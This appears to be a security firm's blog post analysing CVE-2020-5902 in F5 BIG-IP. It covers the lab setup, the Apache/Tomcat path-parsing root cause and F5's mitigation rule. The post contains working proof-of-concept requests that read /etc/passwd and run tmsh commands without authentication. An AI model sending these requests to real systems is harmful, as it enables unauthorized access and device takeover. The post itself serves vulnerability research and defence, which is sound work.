Last weekend, the cybersecurity sphere was in a buzz about the new entry in the Common Vulnerabilities and Exposures database: CVE-2020-5902, a remote code execution vulnerability in F5 BIG-IP devices. Most of the discussion thus far has focused on how to find targets and exploit vulnerabilities; however, one of CertiK’s security researchers decided it was time to do some digging. He downloaded the vulnerable program, built the environment to reproduce the vulnerability, and analyzed the cause of the vulnerability. Read on to learn what he discovered.
BIG-IP devices, made by F5 Networks, integrate functions such as network traffic management, application security management, and load balancing. In other words, they’re hardware that have built-in functionalities that make networks more efficient, reliable, and secure. Mikhail Klyuchnikov, a researcher at Positive Technologies, discovered a remote code execution vulnerability in its Traffic Management User Interface (TMUI), registered under CVE-2020-5902.
The CVSS score for this vulnerability is 10, which means it’s a critical issue that has major repercussions if exploited. An attacker can use the vulnerability to create or delete files, shut down services, execute arbitrary system commands, and ultimately gain full control of the server.
For the specific expression of CVE, please refer to the reference link.
Affected BIG-IP Software Versions
Proof-of-Concept Exploit
Arbitrary file read:
curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Remote tmsh command execution:
curl -k 'https://\[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Temporary fix provided by F5 (will discuss in further detail later):
First, you’ll need to register an account on F5’s official website to download the vulnerable version of BIG-IP software. Navigate to this link to download the BIG-IP TMOS (Traffic Management Operating System).
Next, download the image file for VMware Fusion, named: “BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”
Import virtual machine image in VMware Fusion:
Use the default credentials to login the virtual machine.
Username: root
Password: default
After the system is fully initialized, use the command ‘ifconfig’ to obtain the IP address for the virtual machine. The IP address for our virtual machine is 172.16.4.137
.
Visit the BIG-IP TMUI login interface https://172.16.4.137/tmui/login.jsp
in a browser.
Proof-of-Concept for arbitrary file read
Visit the url below for the content of /etc/passwd
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Proof-of-Concept for tmsh command execution
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Before jumping into the vulnerability detail, we want to mention that the fileRead.jsp and tmshCmd.jsp files can be accessed by authenticated users by default.
To access fileRead.jsp, an authenticated user can use the following URL:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
The following GIF shows the difference between visiting the URL prior to and after login; unauthenticated sessions will result in the user being redirected to the login page.
Although fileRead.jsp and tmshCmd.jsp are used in the Proof-of-Concept exploit, they are not the problem here. The root cause of the vulnerability is how Apache and Java (Tomcat) parse the URL differently, allowing users to bypass authentication and invoke JSP modules. This type of vulnerability was mentioned in the 2018 Blackhat talk from “Orange”: Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out”. Check out the presentation here.
Back to the CVE, the BIG-IP application server parses the URL twice. The first parsing is done by httpd (Apache) and the second time by Java (Tomcat).
When the URL is parsed by Apache for the first time, Apaches cares only about the first half of the URL:
https://172.16.4.137/tmui/login.jsp
/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd`
Apache sees login.jsp, a file that unauthorized users can visit. It then passes the URL to the second parser, ignoring the /..;/
in the URL.
When the URL is parsed for the second time by Java (Tomcat), the /..;/
is interpreted as “back up one level of directory”. Now /login.jsp/
and /..;/
offset each other.
The URL changes from
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
to:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
The fileRead.jsp file gets executed and returns the contents of the /etc/passwd
file.
Based on what we’ve already mentioned, we can also find another URL to exploit the vulnerability, such as:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Here, the https://172.16.4.137/tmui/tmui/login/legal.html
is similar to login.jsp, which is a page that doesn’t require authentication. However we need two /..;/
to offset /login/legal.html
.
Back to the temporary fix mentioned by F5, the fix is to add the following rule in the httpd config:
include ' <LocationMatch ".\*\.\.;.\*"> Redirect 404 / </LocationMatch>
The rule configures httpd to detect if the URL contains the pattern ..;/
, if the pattern is detected, httpd returns 404 not found, instead of passing the URL to the second layer in the backend.
After the exploit of this vulnerability was made public, a large number of hackers began to use this vulnerability to attack systems using F5 BIG-IP products because the attack is easy to execute. A hacker can control the target system at a minimal cost, causing huge damage to the system.
CertiK's security team will help you secure your programs to give you peace of mind by monitoring the occurrence of threats and alerting you to vulnerabilities as soon as they’re discovered to give you all the details and suggestions to implement protective measures. This will help ensure that your system is secure against attacks.
When new vulnerabilities are discovered, our team of security researchers are interested not only in learning to exploit the vulnerabilities, but also to explore the root cause behind them. We use these opportunities to accumulate experience and knowledge to better train our team to find hidden loopholes in complex systems.
For the latest updates, follow us on Twitter (@certik.io) or subscribe to our mailing list.